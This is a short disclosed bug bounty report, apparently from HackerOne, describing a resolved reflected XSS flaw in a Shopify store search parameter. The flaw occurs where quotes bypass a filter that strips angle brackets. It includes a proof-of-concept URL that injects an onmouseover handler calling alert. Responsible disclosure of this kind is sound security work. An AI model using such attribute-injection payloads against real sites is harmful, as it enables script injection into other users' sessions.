XSS *.myshopify.com/collections/vendors?q=

Disclosed: 2018-04-08 10:25:54 By gromoza To shopify

Medium

Vulnerability Details

WAF cut "<",">, but " and ' still in. 1. [PoC example link](https://lostvalues.myshopify.com/collections/vendors?q=X" onmouseover="alert('XSS')" style="font-size: 1001pt;") 2.mouse on X 3. .. 4.XSS alert message ## Impact XSS atack

Actions

View on HackerOne

Report Stats

Report ID: 324136
State: Closed
Substate: resolved
Upvotes: 34

XSS *.myshopify.com/collections/vendors?q=

Vulnerability Details

Actions

Report Stats

Share this report